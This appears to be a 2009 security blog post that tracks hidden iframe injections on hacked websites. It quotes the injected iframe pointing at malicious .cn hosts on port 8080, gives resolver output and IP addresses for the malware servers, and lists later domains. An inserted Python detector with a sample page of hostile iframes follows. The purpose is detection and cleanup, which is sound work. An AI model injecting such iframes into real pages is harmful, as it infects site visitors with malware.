This post is a reminder that .cn iframe attacks are still among the leaders.
The URLs of the malicious iframes change over time. The hackers introduce new suffixes (campaigns?) such as mozila, banner, cocacola and pepsi, and keep adding more and more domain names.
Since the pepsi campaign they have been using port 8080 in the URLs.
The current form of the malicious code looks like this:
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages.
All those .cn domains point at the same IP address, or rather at the same group of IP addresses. Each of them can serve malicious content from 5 different servers in different countries, so that if one server is temporarily unavailable or permanently shut down, the remaining four will still be working.
Here is the output of the dig command that shows 5 “A” records (June 22):
$ dig shopmoviefestival.cn
;; QUESTION SECTION:
;shopmoviefestival.cn. IN A
;; ANSWER SECTION:
shopmoviefestival.cn. 432 IN A 77 .37 .19 .173
shopmoviefestival.cn. 432 IN A 88 .191 .78 .48
shopmoviefestival.cn. 432 IN A 89 .171 .115 .10
shopmoviefestival.cn. 432 IN A 90 .156 .144 .78
shopmoviefestival.cn. 432 IN A 91 .121 .146 .101
This set of IP addresses changes over time as some servers become unavailable. At the time this article was published (June 25), the set of A records looked like this:
[ 90 .156 .144 .78 ], [ 77 .37 .19 .179 ], [ 77 .37 .18 .36 ], [ 77 .37 .19 .43 ], [ 77 .37 .19 .173 ].
A couple of days ago I noticed similar hidden iframes with .pl domains in their URLs:
a3h . pl:8080/ ts/ in .cgi?pepsi76 and a3l . pl:8080/ ts/ in .cgi?pepsi80
Not surprisingly, these domains resolve to the same set of 5 IPs.
Update (June 29, 2009): I have found similar iframes with .ru domains in the URLs: a3h .ru and a5l .ru
Update (July 8, 2009): I have found a similar iframe with an .at domain in the URL: a3l .at
Update (July 21, 2009): Now we have .in: q3e .in and q3t .in
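The injected iframe described above (hidden via visibility or zero size, a .cn/.pl/.ru/.at/.in host on port 8080, an index.php or in.cgi?campaignNN landing path) is simple enough to scan for offline. The following is an added example, not code from the post or from Unmask Parasites; the hostnames in the sample page are constructed placeholders and the marker list is assumed from the variants listed in this post.

```python
import re
from html.parser import HTMLParser

# Markers from the post: TLDs seen so far, port 8080, index.php / in.cgi?<campaign><nn>
CAMPAIGN_TLDS = (".cn", ".pl", ".ru", ".at", ".in")
SRC_RE = re.compile(r"^https?://([^/:]+)(?::(\d+))?(/.*)?$", re.I)
PATH_RE = re.compile(r"/index\.php$|/in\.cgi\?[a-z]+\d+$")

class IframeCollector(HTMLParser):  # collects the attributes of every <iframe> start tag
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def is_hidden(attrs):  # visibility:hidden, display:none, or a zero-sized frame
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        return True
    try:
        return int(attrs.get("width", 1)) == 0 or int(attrs.get("height", 1)) == 0
    except ValueError:
        return False

def classify_src(src):  # campaign markers matched by the src URL; [] means none matched
    m = SRC_RE.match(src.strip())
    if not m:
        return []
    host, port, path = m.group(1).lower(), m.group(2), (m.group(3) or "").lower()
    reasons = []
    if port == "8080":
        reasons.append("port 8080")
    if host.endswith(CAMPAIGN_TLDS):
        reasons.append("tld " + host[host.rfind("."):])
    if PATH_RE.search(path):
        reasons.append("campaign path")
    return reasons

def find_hidden_iframes(html):  # (src, reasons) for each hidden iframe that matches a marker
    p = IframeCollector()
    p.feed(html)
    hits = [(a.get("src", ""), classify_src(a.get("src", ""))) for a in p.iframes if is_hidden(a)]
    return [h for h in hits if h[1]]

# Constructed sample page (placeholder hostnames, not the domains from the post):
SAMPLE_HTML = """<html><body><iframe src="http://example.org/widget.html" width=300 height=200></iframe>
<iframe src="http://evil-example.cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
<iframe src="http://a3h-example.pl:8080/ts/in.cgi?pepsi76" width=0 height=0></iframe></body></html>"""
```

Run it over saved copies of your index pages rather than the live site; a visible iframe or a hidden one pointing at a host with no markers is reported as clean, so review the unreported iframes by hand as well.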
Here are some other domain names that you may encounter as a source parameter of those hidden iframes:
Hidden iframes are easily detected by Unmask Parasites.
You can find the clean-up instructions in my original post about the .cn iframes. They include malware removal from the local computer, changing and securing FTP passwords, and finally uploading a clean copy of the website from a backup.
Finally if your site is blacklisted by Google, request a malware review via Webmaster Tools as soon as possible. If your site is clean, the warning will be removed in a few hours.
As always, any comments are welcome.